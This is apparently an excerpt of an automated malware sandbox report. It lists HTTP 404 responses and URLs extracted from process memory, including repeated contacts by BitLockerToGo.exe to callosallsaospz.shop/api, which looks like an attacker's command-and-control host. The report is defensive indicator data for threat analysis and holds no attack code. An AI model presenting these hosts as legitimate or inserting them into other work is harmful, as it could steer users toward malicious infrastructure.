                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:53:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:54:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:54:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:54:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:54:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:54:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:55:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:55:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:55:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:55:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:55:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:55:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:55:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:55:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:55:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:55:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:55:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:56:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 12:56:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: 60FC.exe, 00000008.00000000.2458245557.00007FF7E76E4000.00000008.00000001.01000000.00000007.sdmp, 60FC.exe, 00000008.00000002.2598803226.00007FF7E76F3000.00000008.00000001.01000000.00000007.sdmp, 60FC.exe.1.drString found in binary or memory: http://.css
                  Source: 60FC.exe, 00000008.00000000.2458245557.00007FF7E76E4000.00000008.00000001.01000000.00000007.sdmp, 60FC.exe, 00000008.00000002.2598803226.00007FF7E76F3000.00000008.00000001.01000000.00000007.sdmp, 60FC.exe.1.drString found in binary or memory: http://.jpg
                  Source: BitLockerToGo.exe, 0000000D.00000003.2643558265.0000000004C1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: BitLockerToGo.exe, 0000000D.00000003.2643558265.0000000004C1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: explorer.exe, 00000001.00000000.1752824604.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1754331572.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                  Source: 6BC6.exe.1.drString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
                  Source: 6BC6.exe.1.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
                  Source: BitLockerToGo.exe, 0000000D.00000003.2643558265.0000000004C1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                  Source: BitLockerToGo.exe, 0000000D.00000003.2643558265.0000000004C1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: BitLockerToGo.exe, 0000000D.00000003.2643558265.0000000004C1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: explorer.exe, 00000001.00000000.1752824604.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1754331572.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                  Source: BitLockerToGo.exe, 0000000D.00000003.2643558265.0000000004C1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: explorer.exe, 00000001.00000000.1752824604.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1754331572.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: 6BC6.exe.1.drString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
                  Source: 6BC6.exe.1.drString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
                  Source: 6BC6.exe.1.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
                  Source: 6BC6.exe.1.drString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                  Source: BitLockerToGo.exe, 0000000D.00000003.2643558265.0000000004C1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                  Source: 60FC.exe, 00000008.00000000.2458245557.00007FF7E76E4000.00000008.00000001.01000000.00000007.sdmp, 60FC.exe, 00000008.00000002.2598803226.00007FF7E76F3000.00000008.00000001.01000000.00000007.sdmp, 60FC.exe.1.drString found in binary or memory: http://html4/loose.dtd
                  Source: powershell.exe, 0000000E.00000002.2697335560.0000020F43FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: explorer.exe, 00000001.00000000.1752824604.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1754331572.000000000982D000.00000004.00000001.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2643558265.0000000004C1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: explorer.exe, 00000001.00000000.1752824604.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                  Source: BitLockerToGo.exe, 0000000D.00000003.2643558265.0000000004C1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                  Source: 6BC6.exe.1.drString found in binary or memory: http://ocsps.ssl.com0
                  Source: 6BC6.exe.1.drString found in binary or memory: http://ocsps.ssl.com0?
                  Source: 6BC6.exe.1.drString found in binary or memory: http://ocsps.ssl.com0_
                  Source: powershell.exe, 0000000E.00000002.2663864981.0000020F34177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: 6BC6.exe, 0000000A.00000002.4157872615.0000012B443EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rentry.co
                  Source: explorer.exe, 00000001.00000000.1755248357.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1753921708.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1753564029.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                  Source: powershell.exe, 0000000E.00000002.2663864981.0000020F34382000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: 6BC6.exe, 0000000A.00000002.4157872615.0000012B43FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2663864981.0000020F33F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 0000000E.00000002.2663864981.0000020F34382000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 0000000E.00000002.2663864981.0000020F34177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: explorer.exe, 00000001.00000000.1758099434.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: 6267.exe, 6267.exe.1.drString found in binary or memory: http://www.oberhumer.com
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: 6BC6.exe.1.drString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
                  Source: 6BC6.exe.1.drString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: 6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: BitLockerToGo.exe, 0000000D.00000003.2643558265.0000000004C1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                  Source: BitLockerToGo.exe, 0000000D.00000003.2643558265.0000000004C1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                  Source: BitLockerToGo.exe, 0000000D.00000003.2604464536.0000000004B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: explorer.exe, 00000001.00000000.1752824604.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
                  Source: explorer.exe, 00000001.00000000.1752824604.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
                  Source: powershell.exe, 0000000E.00000002.2663864981.0000020F33F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 0000000E.00000002.2663864981.0000020F34382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2663864981.0000020F352BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                  Source: powershell.exe, 0000000E.00000002.2663864981.0000020F353B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                  Source: explorer.exe, 00000001.00000000.1758099434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                  Source: explorer.exe, 00000001.00000000.1754331572.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                  Source: explorer.exe, 00000001.00000000.1754331572.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
                  Source: explorer.exe, 00000001.00000000.1751218615.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1751891545.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                  Source: explorer.exe, 00000001.00000000.1754331572.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
                  Source: explorer.exe, 00000001.00000000.1754331572.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                  Source: explorer.exe, 00000001.00000000.1754331572.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
                  Source: BitLockerToGo.exe, 0000000D.00000003.2646882073.0000000004BA5000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2646711159.0000000004BA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                  Source: BitLockerToGo.exe, 0000000D.00000003.2646882073.0000000004BA5000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2646711159.0000000004BA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                  Source: BitLockerToGo.exe, 0000000D.00000003.2748536287.00000000027FD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2697510339.0000000002855000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2749264887.0000000002858000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2600169746.000000000281F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2677007579.000000000281E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2599449395.00000000027FF000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000002.2751394615.00000000027FD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2676850252.0000000002858000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2749166618.0000000002856000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2698739845.000000000285A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2748314851.0000000002855000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2642232685.0000000002808000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2675938074.0000000002851000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2698643151.0000000002856000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2677772639.000000000285A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2642232685.0000000002843000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2676158803.0000000002808000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2710589774.0000000002855000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000002.2752255113.0000000002859000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://callosallsaospz.shop/
                  Source: BitLockerToGo.exe, 0000000D.00000003.2600169746.000000000281F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://callosallsaospz.shop/)
                  Source: BitLockerToGo.exe, 0000000D.00000003.2749264887.0000000002858000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2600169746.000000000281F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2749166618.0000000002856000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2748314851.0000000002855000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000002.2752255113.0000000002859000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://callosallsaospz.shop/1
                  Source: BitLockerToGo.exe, 0000000D.00000003.2600169746.000000000281F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://callosallsaospz.shop/8
                  Source: BitLockerToGo.exe, 0000000D.00000003.2749264887.0000000002858000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2749166618.0000000002856000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2748314851.0000000002855000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2710589774.0000000002855000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000002.2752255113.0000000002859000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://callosallsaospz.shop/?f
                  Source: BitLockerToGo.exe, 0000000D.00000003.2600169746.000000000281F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://callosallsaospz.shop/W
                  Source: BitLockerToGo.exe, 0000000D.00000003.2749264887.0000000002858000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2676850252.0000000002858000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2749166618.0000000002856000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2748314851.0000000002855000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2675938074.0000000002851000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2677772639.000000000285A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2710589774.0000000002855000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000002.2752255113.0000000002859000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://callosallsaospz.shop/a
                  Source: BitLockerToGo.exe, 0000000D.00000003.2600169746.0000000002843000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2749264887.0000000002858000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2664323836.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2749166618.0000000002856000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2748314851.0000000002855000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000002.2751320655.00000000027CB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2642232685.00000000027FD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2639368328.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2663452279.0000000004B9C000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2663912947.0000000004BA0000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2710589774.0000000002855000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2747847286.00000000027CB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000002.2752255113.0000000002859000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://callosallsaospz.shop/api
                  Source: BitLockerToGo.exe, 0000000D.00000002.2751320655.00000000027CB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2747847286.00000000027CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://callosallsaospz.shop/apiWK
                  Source: BitLockerToGo.exe, 0000000D.00000003.2639368328.0000000004BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://callosallsaospz.shop/apinc
                  Source: BitLockerToGo.exe, 0000000D.00000003.2599449395.00000000027FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://callosallsaospz.shop/api~
                  Source: BitLockerToGo.exe, 0000000D.00000003.2676850252.0000000002858000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2675938074.0000000002851000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2677772639.000000000285A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://callosallsaospz.shop/b(f
